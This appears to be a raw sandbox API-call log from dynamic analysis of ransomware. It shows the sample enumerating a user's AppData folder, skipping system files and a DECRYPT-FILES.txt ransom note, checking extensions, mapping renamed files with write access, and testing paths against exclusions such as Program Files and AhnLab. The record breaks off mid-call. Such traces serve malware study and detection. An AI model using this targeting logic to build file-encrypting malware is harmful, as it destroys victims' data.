[0179.750] lstrlenW (lpString="1v9OFDiJWPm8MHHQ.odt.3uxU") returned 25 [0179.751] lstrcmpiW (lpString1="3uxU", lpString2="lnk") returned -1 [0179.751] lstrcmpiW (lpString1="3uxU", lpString2="exe") returned -1 [0179.751] lstrcmpiW (lpString1="3uxU", lpString2="sys") returned -1 [0179.751] lstrcmpiW (lpString1="3uxU", lpString2="dll") returned -1 [0179.751] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0179.751] lstrlenW (lpString="1v9OFDiJWPm8MHHQ.odt.3uxU") returned 25 [0179.751] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0179.751] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="1v9OFDiJWPm8MHHQ.odt.3uxU" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1v9OFDiJWPm8MHHQ.odt.3uxU") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1v9OFDiJWPm8MHHQ.odt.3uxU" [0179.751] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.751] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1v9OFDiJWPm8MHHQ.odt.3uxU" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1v9ofdijwpm8mhhq.odt.3uxu"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0179.751] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=15470) returned 1 [0179.751] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0179.751] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0179.753] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0179.753] CloseHandle (hObject=0x268) returned 1 [0179.753] CloseHandle (hObject=0x264) returned 1 [0179.753] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.753] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa2de0240, ftCreationTime.dwHighDateTime=0x1d4c56e, ftLastAccessTime.dwLowDateTime=0xfbc8d270, ftLastAccessTime.dwHighDateTime=0x1d4d178, ftLastWriteTime.dwLowDateTime=0xa9df2c60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x14263, dwReserved0=0x0, dwReserved1=0x0, cFileName="5hXhWeztPrf9ZQC1Z.png.L8QmF", cAlternateFileName="5HXHWE~1.L8Q")) returned 1 [0179.753] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png.L8QmF", lpString2="DECRYPT-FILES.txt") returned -1 [0179.753] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png.L8QmF", lpString2="autorun.inf") returned -1 [0179.753] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png.L8QmF", lpString2="boot.ini") returned -1 [0179.753] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png.L8QmF", lpString2="desktop.ini") returned -1 [0179.753] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png.L8QmF", lpString2="ntuser.dat") returned -1 [0179.753] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png.L8QmF", lpString2="iconcache.db") returned -1 [0179.753] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png.L8QmF", lpString2="bootsect.bak") returned -1 [0179.753] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png.L8QmF", lpString2="ntuser.dat.log") returned -1 [0179.753] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png.L8QmF", lpString2="thumbs.db") returned -1 [0179.753] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png.L8QmF", lpString2="Bootfont.bin") returned -1 [0179.753] lstrlenW (lpString="5hXhWeztPrf9ZQC1Z.png.L8QmF") returned 27 [0179.753] lstrcmpiW (lpString1="L8QmF", lpString2="lnk") returned -1 [0179.753] lstrcmpiW (lpString1="L8QmF", lpString2="exe") returned 1 [0179.753] lstrcmpiW (lpString1="L8QmF", lpString2="sys") returned -1 [0179.753] lstrcmpiW (lpString1="L8QmF", lpString2="dll") returned 1 [0179.754] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0179.754] lstrlenW (lpString="5hXhWeztPrf9ZQC1Z.png.L8QmF") returned 27 [0179.754] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0179.754] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="5hXhWeztPrf9ZQC1Z.png.L8QmF" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5hXhWeztPrf9ZQC1Z.png.L8QmF") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5hXhWeztPrf9ZQC1Z.png.L8QmF" [0179.754] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.754] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5hXhWeztPrf9ZQC1Z.png.L8QmF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5hxhweztprf9zqc1z.png.l8qmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0179.754] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=82531) returned 1 [0179.754] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0179.754] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0179.756] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0179.756] CloseHandle (hObject=0x268) returned 1 [0179.756] CloseHandle (hObject=0x264) returned 1 [0179.756] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.756] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2c774b20, ftCreationTime.dwHighDateTime=0x1d4cbbd, ftLastAccessTime.dwLowDateTime=0x3597d810, ftLastAccessTime.dwHighDateTime=0x1d4cb21, ftLastWriteTime.dwLowDateTime=0xa9e3ef20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1867b, dwReserved0=0x0, dwReserved1=0x0, cFileName="6pO6mQLU.m4a.i4N4j", cAlternateFileName="6PO6MQ~1.I4N")) returned 1 [0179.756] lstrcmpiW (lpString1="6pO6mQLU.m4a.i4N4j", lpString2="DECRYPT-FILES.txt") returned -1 [0179.756] lstrcmpiW (lpString1="6pO6mQLU.m4a.i4N4j", lpString2="autorun.inf") returned -1 [0179.756] lstrcmpiW (lpString1="6pO6mQLU.m4a.i4N4j", lpString2="boot.ini") returned -1 [0179.756] lstrcmpiW (lpString1="6pO6mQLU.m4a.i4N4j", lpString2="desktop.ini") returned -1 [0179.756] lstrcmpiW (lpString1="6pO6mQLU.m4a.i4N4j", lpString2="ntuser.dat") returned -1 [0179.756] lstrcmpiW (lpString1="6pO6mQLU.m4a.i4N4j", lpString2="iconcache.db") returned -1 [0179.756] lstrcmpiW (lpString1="6pO6mQLU.m4a.i4N4j", lpString2="bootsect.bak") returned -1 [0179.756] lstrcmpiW (lpString1="6pO6mQLU.m4a.i4N4j", lpString2="ntuser.dat.log") returned -1 [0179.756] lstrcmpiW (lpString1="6pO6mQLU.m4a.i4N4j", lpString2="thumbs.db") returned -1 [0179.756] lstrcmpiW (lpString1="6pO6mQLU.m4a.i4N4j", lpString2="Bootfont.bin") returned -1 [0179.756] lstrlenW (lpString="6pO6mQLU.m4a.i4N4j") returned 18 [0179.756] lstrcmpiW (lpString1="i4N4j", lpString2="lnk") returned -1 [0179.756] lstrcmpiW (lpString1="i4N4j", lpString2="exe") returned 1 [0179.756] lstrcmpiW (lpString1="i4N4j", lpString2="sys") returned -1 [0179.756] lstrcmpiW (lpString1="i4N4j", lpString2="dll") returned 1 [0179.756] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0179.756] lstrlenW (lpString="6pO6mQLU.m4a.i4N4j") returned 18 [0179.757] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0179.757] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="6pO6mQLU.m4a.i4N4j" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6pO6mQLU.m4a.i4N4j") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6pO6mQLU.m4a.i4N4j" [0179.757] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.757] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\6pO6mQLU.m4a.i4N4j" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\6po6mqlu.m4a.i4n4j"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0179.757] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=99963) returned 1 [0179.757] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0179.757] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0179.758] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0179.758] CloseHandle (hObject=0x268) returned 1 [0179.758] CloseHandle (hObject=0x264) returned 1 [0179.759] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.759] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4cd1840, ftCreationTime.dwHighDateTime=0x1d4cc10, ftLastAccessTime.dwLowDateTime=0xbe83e370, ftLastAccessTime.dwHighDateTime=0x1d4cf1e, ftLastWriteTime.dwLowDateTime=0xa9e8b1e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1414e, dwReserved0=0x0, dwReserved1=0x0, cFileName="7bIriEMdRI7QK.mp3.Fdiwyd", cAlternateFileName="7BIRIE~1.FDI")) returned 1 [0179.759] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3.Fdiwyd", lpString2="DECRYPT-FILES.txt") returned -1 [0179.759] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3.Fdiwyd", lpString2="autorun.inf") returned -1 [0179.759] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3.Fdiwyd", lpString2="boot.ini") returned -1 [0179.759] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3.Fdiwyd", lpString2="desktop.ini") returned -1 [0179.759] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3.Fdiwyd", lpString2="ntuser.dat") returned -1 [0179.759] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3.Fdiwyd", lpString2="iconcache.db") returned -1 [0179.759] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3.Fdiwyd", lpString2="bootsect.bak") returned -1 [0179.759] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3.Fdiwyd", lpString2="ntuser.dat.log") returned -1 [0179.759] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3.Fdiwyd", lpString2="thumbs.db") returned -1 [0179.759] lstrcmpiW (lpString1="7bIriEMdRI7QK.mp3.Fdiwyd", lpString2="Bootfont.bin") returned -1 [0179.759] lstrlenW (lpString="7bIriEMdRI7QK.mp3.Fdiwyd") returned 24 [0179.759] lstrcmpiW (lpString1="Fdiwyd", lpString2="lnk") returned -1 [0179.759] lstrcmpiW (lpString1="Fdiwyd", lpString2="exe") returned 1 [0179.759] lstrcmpiW (lpString1="Fdiwyd", lpString2="sys") returned -1 [0179.759] lstrcmpiW (lpString1="Fdiwyd", lpString2="dll") returned 1 [0179.759] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0179.759] lstrlenW (lpString="7bIriEMdRI7QK.mp3.Fdiwyd") returned 24 [0179.759] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0179.759] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="7bIriEMdRI7QK.mp3.Fdiwyd" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7bIriEMdRI7QK.mp3.Fdiwyd") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7bIriEMdRI7QK.mp3.Fdiwyd" [0179.759] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.760] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7bIriEMdRI7QK.mp3.Fdiwyd" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7biriemdri7qk.mp3.fdiwyd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0179.760] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=82254) returned 1 [0179.760] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0179.760] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0179.761] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0179.761] CloseHandle (hObject=0x268) returned 1 [0179.761] CloseHandle (hObject=0x264) returned 1 [0179.761] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.762] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1569a4b0, ftCreationTime.dwHighDateTime=0x1d4c608, ftLastAccessTime.dwLowDateTime=0x430b0f20, ftLastAccessTime.dwHighDateTime=0x1d4d4be, ftLastWriteTime.dwLowDateTime=0xa9eb1340, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x88ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="7zAz7ryW DljTX1J.wav.JY5p", cAlternateFileName="7ZAZ7R~1.JY5")) returned 1 [0179.762] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav.JY5p", lpString2="DECRYPT-FILES.txt") returned -1 [0179.762] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav.JY5p", lpString2="autorun.inf") returned -1 [0179.762] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav.JY5p", lpString2="boot.ini") returned -1 [0179.762] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav.JY5p", lpString2="desktop.ini") returned -1 [0179.762] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav.JY5p", lpString2="ntuser.dat") returned -1 [0179.762] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav.JY5p", lpString2="iconcache.db") returned -1 [0179.762] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav.JY5p", lpString2="bootsect.bak") returned -1 [0179.762] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav.JY5p", lpString2="ntuser.dat.log") returned -1 [0179.762] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav.JY5p", lpString2="thumbs.db") returned -1 [0179.762] lstrcmpiW (lpString1="7zAz7ryW DljTX1J.wav.JY5p", lpString2="Bootfont.bin") returned -1 [0179.762] lstrlenW (lpString="7zAz7ryW DljTX1J.wav.JY5p") returned 25 [0179.762] lstrcmpiW (lpString1="JY5p", lpString2="lnk") returned -1 [0179.762] lstrcmpiW (lpString1="JY5p", lpString2="exe") returned 1 [0179.762] lstrcmpiW (lpString1="JY5p", lpString2="sys") returned -1 [0179.762] lstrcmpiW (lpString1="JY5p", lpString2="dll") returned 1 [0179.762] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0179.762] lstrlenW (lpString="7zAz7ryW DljTX1J.wav.JY5p") returned 25 [0179.762] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0179.762] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="7zAz7ryW DljTX1J.wav.JY5p" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zAz7ryW DljTX1J.wav.JY5p") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zAz7ryW DljTX1J.wav.JY5p" [0179.762] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.762] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\7zAz7ryW DljTX1J.wav.JY5p" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\7zaz7ryw dljtx1j.wav.jy5p"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0179.763] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=34988) returned 1 [0179.763] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0179.763] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0179.765] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0179.765] CloseHandle (hObject=0x268) returned 1 [0179.765] CloseHandle (hObject=0x264) returned 1 [0179.765] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.765] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5873ea50, ftCreationTime.dwHighDateTime=0x1d4ceae, ftLastAccessTime.dwLowDateTime=0xc2677f60, ftLastAccessTime.dwHighDateTime=0x1d4c690, ftLastWriteTime.dwLowDateTime=0xa9efd600, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1025a, dwReserved0=0x0, dwReserved1=0x0, cFileName="9hYC b9 OAgc.png.4TSn", cAlternateFileName="9HYCB9~1.4TS")) returned 1 [0179.765] lstrcmpiW (lpString1="9hYC b9 OAgc.png.4TSn", lpString2="DECRYPT-FILES.txt") returned -1 [0179.766] lstrcmpiW (lpString1="9hYC b9 OAgc.png.4TSn", lpString2="autorun.inf") returned -1 [0179.766] lstrcmpiW (lpString1="9hYC b9 OAgc.png.4TSn", lpString2="boot.ini") returned -1 [0179.766] lstrcmpiW (lpString1="9hYC b9 OAgc.png.4TSn", lpString2="desktop.ini") returned -1 [0179.766] lstrcmpiW (lpString1="9hYC b9 OAgc.png.4TSn", lpString2="ntuser.dat") returned -1 [0179.766] lstrcmpiW (lpString1="9hYC b9 OAgc.png.4TSn", lpString2="iconcache.db") returned -1 [0179.766] lstrcmpiW (lpString1="9hYC b9 OAgc.png.4TSn", lpString2="bootsect.bak") returned -1 [0179.766] lstrcmpiW (lpString1="9hYC b9 OAgc.png.4TSn", lpString2="ntuser.dat.log") returned -1 [0179.766] lstrcmpiW (lpString1="9hYC b9 OAgc.png.4TSn", lpString2="thumbs.db") returned -1 [0179.766] lstrcmpiW (lpString1="9hYC b9 OAgc.png.4TSn", lpString2="Bootfont.bin") returned -1 [0179.766] lstrlenW (lpString="9hYC b9 OAgc.png.4TSn") returned 21 [0179.766] lstrcmpiW (lpString1="4TSn", lpString2="lnk") returned -1 [0179.766] lstrcmpiW (lpString1="4TSn", lpString2="exe") returned -1 [0179.766] lstrcmpiW (lpString1="4TSn", lpString2="sys") returned -1 [0179.766] lstrcmpiW (lpString1="4TSn", lpString2="dll") returned -1 [0179.766] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0179.766] lstrlenW (lpString="9hYC b9 OAgc.png.4TSn") returned 21 [0179.766] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0179.766] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="9hYC b9 OAgc.png.4TSn" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9hYC b9 OAgc.png.4TSn") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9hYC b9 OAgc.png.4TSn" [0179.766] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0179.766] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\9hYC b9 OAgc.png.4TSn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\9hyc b9 oagc.png.4tsn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x264 [0179.767] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x36fe228 | out: lpFileSize=0x36fe228*=66138) returned 1 [0179.767] CreateFileMappingW (hFile=0x264, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x268 [0179.767] MapViewOfFile (hFileMappingObject=0x268, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0179.769] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0179.769] CloseHandle (hObject=0x268) returned 1 [0179.769] CloseHandle (hObject=0x264) returned 1 [0179.769] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0179.769] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xa9f498c0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa9f498c0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0179.769] lstrcmpW (lpString1="Adobe", lpString2=".") returned 1 [0179.769] lstrcmpW (lpString1="Adobe", lpString2="..") returned 1 [0179.769] lstrcatW (in: lpString1="Adobe", lpString2="\\" | out: lpString1="Adobe\\") returned="Adobe\\" [0179.769] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Adobe\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\" [0179.769] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\Program Files") returned 0x0 [0179.769] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch=":\\Windows") returned 0x0 [0179.769] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\Games\\") returned 0x0 [0179.769] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\Tor Browser\\") returned 0x0 [0179.769] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\ProgramData\\") returned 0x0 [0179.769] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0179.770] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0179.770] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0179.770] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\All Users") returned 0x0 [0179.770] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\IETldCache\\") returned 0x0 [0179.770] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\Local Settings\\") returned 0x0 [0179.770] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="\\AppData\\Local") returned 0x0 [0179.770] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", lpSrch="AhnLab") returned 0x0 [0179.770] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\", 